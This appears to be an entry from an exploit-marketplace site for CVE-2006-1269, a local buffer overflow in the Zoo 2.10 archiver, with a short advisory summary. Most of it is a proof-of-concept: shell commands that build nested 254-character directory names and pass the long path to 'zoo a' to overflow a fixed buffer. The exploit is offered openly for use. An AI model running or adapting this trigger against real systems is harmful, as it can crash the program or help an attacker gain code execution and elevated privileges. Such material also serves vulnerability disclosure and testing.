[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability

Author
Josh Bressers
Risk
[
Security Risk High
]
0day-ID
0day-ID-22021
Category
local exploits
Date add
12-03-2014
CVE
CVE-2006-1269
Platform
linux
source: http://www.securityfocus.com/bid/17126/info
 
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
 
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
 
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`

#  0day.today [2024-07-04]  #